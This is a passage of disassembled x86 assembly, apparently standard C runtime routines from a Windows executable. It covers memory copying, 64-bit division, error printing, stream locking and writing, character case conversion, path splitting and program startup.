rep movsd
cld
jmp off_42BD70[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_42BCA8: ; DATA XREF: sub_42BA90+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_42BC50
std
rep movsd
cld
jmp off_42BD70[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_42BC50
std
rep movsd
cld
jmp off_42BD70[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_42BD24
dd offset loc_42BD2C
dd offset loc_42BD34
dd offset loc_42BD3C
dd offset loc_42BD44
dd offset loc_42BD4C
dd offset loc_42BD54
off_42BD20 dd offset loc_42BD67 ; DATA XREF: sub_42BA90+1C2�r
; ---------------------------------------------------------------------------
loc_42BD24: ; DATA XREF: sub_42BA90+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_42BD2C: ; DATA XREF: sub_42BA90+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_42BD34: ; DATA XREF: sub_42BA90+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_42BD3C: ; DATA XREF: sub_42BA90+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_42BD44: ; DATA XREF: sub_42BA90+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_42BD4C: ; DATA XREF: sub_42BA90+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_42BD54: ; DATA XREF: sub_42BA90+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42BD67: ; CODE XREF: sub_42BA90+1C2�j
; DATA XREF: sub_42BA90:off_42BD20�o
jmp off_42BD70[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_42BD70 dd offset loc_42BD80 ; DATA XREF: sub_42BA90+1B7�r
; sub_42BA90:loc_42BC74�r ...
dd offset loc_42BD88
dd offset loc_42BD98
dd offset loc_42BDAC
; ---------------------------------------------------------------------------
loc_42BD80: ; CODE XREF: sub_42BA90+1B7�j
; sub_42BA90:loc_42BC74�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BD88: ; CODE XREF: sub_42BA90+1B7�j
; sub_42BA90:loc_42BC74�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BD98: ; CODE XREF: sub_42BA90+1B7�j
; sub_42BA90:loc_42BC74�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BDAC: ; CODE XREF: sub_42BA90+1B7�j
; sub_42BA90:loc_42BC74�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_42BA90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42BDD0 proc near ; CODE XREF: sub_41BD4B+3D�p
; sub_427E4F+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_42BDF1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_42BE41
; ---------------------------------------------------------------------------
loc_42BDF1: ; CODE XREF: sub_42BDD0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_42BDFF: ; CODE XREF: sub_42BDD0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_42BDFF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_42BE2A
cmp edx, [esp+4+arg_4]
ja short loc_42BE2A
jb short loc_42BE32
cmp eax, [esp+4+arg_0]
jbe short loc_42BE32
loc_42BE2A: ; CODE XREF: sub_42BDD0+4A�j
; sub_42BDD0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_42BE32: ; CODE XREF: sub_42BDD0+52�j
; sub_42BDD0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_42BE41: ; CODE XREF: sub_42BDD0+1F�j
pop ebx
retn 10h
sub_42BDD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42BE50 proc near ; CODE XREF: sub_41BD4B+24�p
; sub_427E4F+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_42BE72
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_42BEB3
; ---------------------------------------------------------------------------
loc_42BE72: ; CODE XREF: sub_42BE50+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_42BE80: ; CODE XREF: sub_42BE50+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_42BE80
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_42BEAE
cmp edx, [esp+8+arg_4]
ja short loc_42BEAE
jb short loc_42BEAF
cmp eax, [esp+8+arg_0]
jbe short loc_42BEAF
loc_42BEAE: ; CODE XREF: sub_42BE50+4E�j
; sub_42BE50+54�j
dec esi
loc_42BEAF: ; CODE XREF: sub_42BE50+56�j
; sub_42BE50+5C�j
xor edx, edx
mov eax, esi
loc_42BEB3: ; CODE XREF: sub_42BE50+20�j
pop esi
pop ebx
retn 10h
sub_42BE50 endp
; =============== S U B R O U T I N E =======================================
sub_42BEB8 proc near ; CODE XREF: sub_41EC9D+14C�p
; sub_41EC9D+15E�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push ebx
push esi
mov esi, offset dword_450EE0
push edi
push esi
push 1
call sub_42C203
push esi
call sub_432104
mov edi, eax
lea eax, [esp+18h+arg_4]
push eax
push [esp+1Ch+arg_0]
push esi
call sub_42DC7D
push esi
push edi
mov ebx, eax
call sub_432191
push esi
push 1
call sub_42C255
add esp, 28h
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_42BEB8 endp
; =============== S U B R O U T I N E =======================================
sub_42BEF9 proc near ; CODE XREF: sub_41EC9D+12B�p
arg_0 = dword ptr 4
push esi
push edi
push 2
pop edi
push edi
call sub_43241B
mov esi, [esp+0Ch+arg_0]
pop ecx
test esi, esi
jz short loc_42BF2F
cmp byte ptr [esi], 0
jz short loc_42BF2F
push esi
call sub_4293A0
push eax
push esi
push edi
call sub_432501
push edi
push offset asc_450388 ; ": "
push edi
call sub_432501
add esp, 1Ch
loc_42BF2F: ; CODE XREF: sub_42BEF9+12�j
; sub_42BEF9+17�j
call sub_42F119
cmp dword ptr [eax], 0
jl short loc_42BF51
call sub_42F119
mov eax, [eax]
cmp eax, dword_453994
jge short loc_42BF51
call sub_42F119
mov eax, [eax]
jmp short loc_42BF56
; ---------------------------------------------------------------------------
loc_42BF51: ; CODE XREF: sub_42BEF9+3E�j
; sub_42BEF9+4D�j
mov eax, dword_453994
loc_42BF56: ; CODE XREF: sub_42BEF9+56�j
mov esi, off_4538E4[eax*4]
push esi
call sub_4293A0
push eax
push esi
push edi
call sub_432501
push 1
push offset asc_440D90 ; "\n"
push edi
call sub_432501
push edi
call sub_43247A
add esp, 20h
pop edi
pop esi
retn
sub_42BEF9 endp
; =============== S U B R O U T I N E =======================================
sub_42BF84 proc near ; CODE XREF: sub_42BF90�j
push offset off_450EC0
call sub_4326BD
pop ecx
retn
sub_42BF84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42BF90 proc near ; CODE XREF: sub_41F0F5+3B6�p
jmp sub_42BF84
sub_42BF90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BF95 proc near ; CODE XREF: sub_41F876+2F1�p
; sub_41FC58+154�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_4293A0
cmp eax, 1
pop ecx
jb short loc_42BFD0
cmp byte ptr [ebx+1], 3Ah
jnz short loc_42BFD0
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_42BFCC
push 2
push ebx
push esi
call sub_432ABC
add esp, 0Ch
and byte ptr [esi+2], 0
loc_42BFCC: ; CODE XREF: sub_42BF95+25�j
inc ebx
inc ebx
jmp short loc_42BFDA
; ---------------------------------------------------------------------------
loc_42BFD0: ; CODE XREF: sub_42BF95+18�j
; sub_42BF95+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_42BFDA
and byte ptr [eax], 0
loc_42BFDA: ; CODE XREF: sub_42BF95+39�j
; sub_42BF95+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_42C052
loc_42BFED: ; CODE XREF: sub_42BF95+87�j
mov cl, [eax]
movzx edx, cl
test byte_676DC1[edx], 4
jz short loc_42BFFE
inc eax
jmp short loc_42C018
; ---------------------------------------------------------------------------
loc_42BFFE: ; CODE XREF: sub_42BF95+64�j
cmp cl, 2Fh
jz short loc_42C012
cmp cl, 5Ch
jz short loc_42C012
cmp cl, 2Eh
jnz short loc_42C018
mov [ebp+var_4], eax
jmp short loc_42C018
; ---------------------------------------------------------------------------
loc_42C012: ; CODE XREF: sub_42BF95+6C�j
; sub_42BF95+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_42C018: ; CODE XREF: sub_42BF95+67�j
; sub_42BF95+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_42BFED
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_42C052
cmp [ebp+arg_8], 0
jz short loc_42C04D
sub edi, ebx
cmp edi, esi
jb short loc_42C036
mov edi, esi
loc_42C036: ; CODE XREF: sub_42BF95+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_432ABC
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_42C04D: ; CODE XREF: sub_42BF95+97�j
mov ebx, [ebp+arg_4]
jmp short loc_42C05C
; ---------------------------------------------------------------------------
loc_42C052: ; CODE XREF: sub_42BF95+56�j
; sub_42BF95+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_42C05C
and byte ptr [ecx], 0
loc_42C05C: ; CODE XREF: sub_42BF95+BB�j
; sub_42BF95+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_42C0AF
cmp edi, ebx
jb short loc_42C0AF
cmp [ebp+arg_C], 0
jz short loc_42C08C
sub edi, ebx
cmp edi, esi
jb short loc_42C075
mov edi, esi
loc_42C075: ; CODE XREF: sub_42BF95+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_432ABC
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_42C08C: ; CODE XREF: sub_42BF95+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_42C0D7
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_42C09C
mov esi, eax
loc_42C09C: ; CODE XREF: sub_42BF95+103�j
push esi
push [ebp+var_4]
push edi
call sub_432ABC
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_42C0D7
; ---------------------------------------------------------------------------
loc_42C0AF: ; CODE XREF: sub_42BF95+CC�j
; sub_42BF95+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_42C0CD
sub eax, ebx
cmp eax, esi
jnb short loc_42C0BE
mov esi, eax
loc_42C0BE: ; CODE XREF: sub_42BF95+125�j
push esi
push ebx
push edi
call sub_432ABC
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_42C0CD: ; CODE XREF: sub_42BF95+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_42C0D7
and byte ptr [eax], 0
loc_42C0D7: ; CODE XREF: sub_42BF95+FC�j
; sub_42BF95+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42BF95 endp
; =============== S U B R O U T I N E =======================================
sub_42C0DC proc near ; CODE XREF: sub_41FC58+184�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
push esi
call sub_42C1D4
push esi
call sub_432104
mov edi, eax
lea eax, [esp+14h+arg_8]
push eax
push [esp+18h+arg_4]
push esi
call sub_42DC7D
push esi
push edi
mov ebx, eax
call sub_432191
push esi
call sub_42C226
add esp, 20h
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_42C0DC endp
; =============== S U B R O U T I N E =======================================
sub_42C118 proc near ; DATA XREF: .text:0043A01C�o
mov eax, dword_678020
push esi
push 14h
test eax, eax
pop esi
jnz short loc_42C12C
mov eax, 200h
jmp short loc_42C132
; ---------------------------------------------------------------------------
loc_42C12C: ; CODE XREF: sub_42C118+B�j
cmp eax, esi
jge short loc_42C137
mov eax, esi
loc_42C132: ; CODE XREF: sub_42C118+12�j
mov dword_678020, eax
loc_42C137: ; CODE XREF: sub_42C118+16�j
push 4
push eax
call sub_42B39A
pop ecx
mov dword_67700C, eax
test eax, eax
pop ecx
jnz short loc_42C16B
push 4
push esi
mov dword_678020, esi
call sub_42B39A
pop ecx
mov dword_67700C, eax
test eax, eax
pop ecx
jnz short loc_42C16B
push 1Ah
call sub_42C67C
pop ecx
loc_42C16B: ; CODE XREF: sub_42C118+30�j
; sub_42C118+49�j
xor ecx, ecx
mov eax, offset off_450EC0
loc_42C172: ; CODE XREF: sub_42C118+6E�j
mov edx, dword_67700C
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset off_451140
jl short loc_42C172
xor ecx, ecx
mov edx, offset dword_450ED0
loc_42C18F: ; CODE XREF: sub_42C118+A4�j
mov esi, ecx
mov eax, ecx
sar esi, 5
and eax, 1Fh
mov esi, dword_676EE0[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_42C1AF
test eax, eax
jnz short loc_42C1B2
loc_42C1AF: ; CODE XREF: sub_42C118+91�j
or dword ptr [edx], 0FFFFFFFFh
loc_42C1B2: ; CODE XREF: sub_42C118+95�j
add edx, 20h
inc ecx
cmp edx, offset dword_450F30
jl short loc_42C18F
pop esi
retn
sub_42C118 endp
; =============== S U B R O U T I N E =======================================
sub_42C1C0 proc near ; DATA XREF: .text:0043A030�o
call sub_42F335
cmp byte_676A04, 0
jz short locret_42C1D3
jmp sub_432B56
; ---------------------------------------------------------------------------
locret_42C1D3: ; CODE XREF: sub_42C1C0+C�j
retn
sub_42C1C0 endp
; =============== S U B R O U T I N E =======================================
sub_42C1D4 proc near ; CODE XREF: sub_42A10B+16�p
; sub_42A188+7�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_450EC0
cmp eax, ecx
jb short loc_42C1F8
cmp eax, offset dword_451120
ja short loc_42C1F8
sub eax, ecx
sar eax, 5
add eax, 1Ch
push eax
call sub_42DAEF
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C1F8: ; CODE XREF: sub_42C1D4+B�j
; sub_42C1D4+12�j
add eax, 20h
push eax
call dword_4370CC ; RtlEnterCriticalSection
retn
sub_42C1D4 endp
; =============== S U B R O U T I N E =======================================
sub_42C203 proc near ; CODE XREF: sub_42BEB8+B�p
; sub_42F33E+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_42C217
add eax, 1Ch
push eax
call sub_42DAEF
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C217: ; CODE XREF: sub_42C203+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_4370CC ; RtlEnterCriticalSection
retn
sub_42C203 endp
; =============== S U B R O U T I N E =======================================
sub_42C226 proc near ; CODE XREF: sub_42A10B+24�p
; sub_42A188+22�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_450EC0
cmp eax, ecx
jb short loc_42C24A
cmp eax, offset dword_451120
ja short loc_42C24A
sub eax, ecx
sar eax, 5
add eax, 1Ch
push eax
call sub_42DB50
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C24A: ; CODE XREF: sub_42C226+B�j
; sub_42C226+12�j
add eax, 20h
push eax
call dword_437164 ; RtlLeaveCriticalSection
retn
sub_42C226 endp
; =============== S U B R O U T I N E =======================================
sub_42C255 proc near ; CODE XREF: sub_42BEB8+33�p
; sub_42F33E+7D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_42C269
add eax, 1Ch
push eax
call sub_42DB50
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C269: ; CODE XREF: sub_42C255+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_437164 ; RtlLeaveCriticalSection
retn
sub_42C255 endp
; =============== S U B R O U T I N E =======================================
sub_42C278 proc near ; CODE XREF: sub_41FE3F+15D�p
; sub_429E59+12B�p
arg_0 = dword ptr 4
push ebx
xor ebx, ebx
cmp dword_6769A8, ebx
jnz short loc_42C296
mov eax, [esp+4+arg_0]
cmp eax, 61h
jl short loc_42C2E5
cmp eax, 7Ah
jg short loc_42C2E5
sub eax, 20h
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42C296: ; CODE XREF: sub_42C278+9�j
push esi
mov esi, offset dword_676EDC
push edi
push esi
call dword_437224 ; InterlockedIncrement
cmp dword_676ED8, ebx
mov edi, dword_437220
jz short loc_42C2C0
push esi
call edi ; dword_437220
push 13h
call sub_42DAEF
pop ecx
push 1
pop ebx
loc_42C2C0: ; CODE XREF: sub_42C278+38�j
push [esp+0Ch+arg_0]
call sub_42C2E7
test ebx, ebx
pop ecx
mov [esp+0Ch+arg_0], eax
jz short loc_42C2DC
push 13h
call sub_42DB50
pop ecx
jmp short loc_42C2DF
; ---------------------------------------------------------------------------
loc_42C2DC: ; CODE XREF: sub_42C278+58�j
push esi
call edi ; dword_437220
loc_42C2DF: ; CODE XREF: sub_42C278+62�j
mov eax, [esp+0Ch+arg_0]
pop edi
pop esi
loc_42C2E5: ; CODE XREF: sub_42C278+12�j
; sub_42C278+17�j
pop ebx
retn
sub_42C278 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C2E7 proc near ; CODE XREF: sub_42C278+4C�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_6769A8, 0
push ebx
jnz short loc_42C312
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_42C3B0
cmp eax, 7Ah
jg loc_42C3B0
sub eax, 20h
jmp loc_42C3B0
; ---------------------------------------------------------------------------
loc_42C312: ; CODE XREF: sub_42C2E7+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_42C345
cmp dword_4535C4, 1
jle short loc_42C332
push 2
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42C33D
; ---------------------------------------------------------------------------
loc_42C332: ; CODE XREF: sub_42C2E7+3D�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, 2
loc_42C33D: ; CODE XREF: sub_42C2E7+49�j
test eax, eax
jnz short loc_42C345
loc_42C341: ; CODE XREF: sub_42C2E7+AF�j
mov eax, ebx
jmp short loc_42C3B0
; ---------------------------------------------------------------------------
loc_42C345: ; CODE XREF: sub_42C2E7+34�j
; sub_42C2E7+58�j
mov edx, off_4533B8
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_42C368
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_42C371
; ---------------------------------------------------------------------------
loc_42C368: ; CODE XREF: sub_42C2E7+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_42C371: ; CODE XREF: sub_42C2E7+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword_6769A8
call sub_430D9F
add esp, 20h
test eax, eax
jz short loc_42C341
cmp eax, 1
jnz short loc_42C3A3
movzx eax, [ebp+var_4]
jmp short loc_42C3B0
; ---------------------------------------------------------------------------
loc_42C3A3: ; CODE XREF: sub_42C2E7+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_42C3B0: ; CODE XREF: sub_42C2E7+14�j
; sub_42C2E7+1D�j ...
pop ebx
leave
retn
sub_42C2E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C3B3 proc near ; CODE XREF: sub_42045F+536�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
call sub_42C1D4
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42C3E2
push [ebp+arg_C]
mov esi, eax
call sub_42C226
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_42C3B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C3E2 proc near ; CODE XREF: sub_42C3B3+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_42C406
xor eax, eax
jmp loc_42C4D3
; ---------------------------------------------------------------------------
loc_42C406: ; CODE XREF: sub_42C3E2+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_42C419
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_42C420
; ---------------------------------------------------------------------------
loc_42C419: ; CODE XREF: sub_42C3E2+2D�j
mov [ebp+arg_C], 1000h
loc_42C420: ; CODE XREF: sub_42C3E2+35�j
; sub_42C3E2+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_42C454
mov eax, [esi+4]
test eax, eax
jz short loc_42C454
cmp ebx, eax
mov edi, ebx
jb short loc_42C43A
mov edi, eax
loc_42C43A: ; CODE XREF: sub_42C3E2+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_429420
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_42C49A
; ---------------------------------------------------------------------------
loc_42C454: ; CODE XREF: sub_42C3E2+47�j
; sub_42C3E2+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_42C49F
test ecx, ecx
jz short loc_42C468
push esi
call sub_42F2D9
test eax, eax
pop ecx
jnz short loc_42C4E1
loc_42C468: ; CODE XREF: sub_42C3E2+79�j
cmp [ebp+arg_C], 0
jz short loc_42C47B
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_42C47D
; ---------------------------------------------------------------------------
loc_42C47B: ; CODE XREF: sub_42C3E2+8A�j
mov edi, ebx
loc_42C47D: ; CODE XREF: sub_42C3E2+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_43249C
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_42C4D8
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_42C4D8
loc_42C49A: ; CODE XREF: sub_42C3E2+70�j
mov edi, [ebp+var_4]
jmp short loc_42C4C8
; ---------------------------------------------------------------------------
loc_42C49F: ; CODE XREF: sub_42C3E2+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_42DB65
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42C4E1
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_42C4C8
mov [ebp+arg_C], 1
loc_42C4C8: ; CODE XREF: sub_42C3E2+BB�j
; sub_42C3E2+DD�j
test ebx, ebx
jnz loc_42C420
mov eax, [ebp+arg_8]
loc_42C4D3: ; CODE XREF: sub_42C3E2+1F�j
; sub_42C3E2+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42C4D8: ; CODE XREF: sub_42C3E2+AD�j
; sub_42C3E2+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_42C4E3
; ---------------------------------------------------------------------------
loc_42C4E1: ; CODE XREF: sub_42C3E2+84�j
; sub_42C3E2+CF�j
mov eax, edi
loc_42C4E3: ; CODE XREF: sub_42C3E2+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_42C4D3
sub_42C3E2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42C4F0 proc near ; CODE XREF: sub_4225E4+17F�p
; sub_42E5F5+7F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_42C509
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_42C509: ; CODE XREF: sub_42C4F0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_42C4F0 endp
; =============== S U B R O U T I N E =======================================
sub_42C524 proc near ; CODE XREF: sub_426761+1AF�p
arg_0 = dword ptr 4
cmp dword_4535C4, 1
jle short loc_42C53B
push 4
push [esp+4+arg_0]
call sub_42F12B
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C53B: ; CODE XREF: sub_42C524+7�j
mov eax, [esp+arg_0]
mov ecx, off_4533B8
mov al, [ecx+eax*2]
and eax, 4
retn
sub_42C524 endp
; =============== S U B R O U T I N E =======================================
sub_42C54C proc near ; CODE XREF: sub_42E5F5+76�p
; sub_42E5F5+88�p ...
arg_0 = dword ptr 4
cmp dword_4535C4, 1
jle short loc_42C563
push 8
push [esp+4+arg_0]
call sub_42F12B
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C563: ; CODE XREF: sub_42C54C+7�j
mov eax, [esp+arg_0]
mov ecx, off_4533B8
mov al, [ecx+eax*2]
and eax, 8
retn
sub_42C54C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4374C0
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_437240 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_6769DC, edx
mov ecx, eax
and ecx, 0FFh
mov dword_6769D8, ecx
shl ecx, 8
add ecx, edx
mov dword_6769D4, ecx
shr eax, 10h
mov dword ptr byte_6769D0, eax
push 1
call sub_42C855
pop ecx
test eax, eax
jnz short loc_42C5DF
push 1Ch
call sub_42C6A1
pop ecx
loc_42C5DF: ; CODE XREF: .text:0042C5D5�j
call sub_42E487
test eax, eax
jnz short loc_42C5F0
push 10h
call sub_42C6A1
pop ecx
loc_42C5F0: ; CODE XREF: .text:0042C5E6�j
xor esi, esi
mov [ebp-4], esi
call sub_42F6FC
call dword_43723C ; GetCommandLineA
mov dword_677008, eax
call sub_432F35
mov dword_676924, eax
call sub_432CE8
call sub_432C2F
call sub_430B07
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_437238 ; GetStartupInfoA
call sub_432BD7
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_42C63F
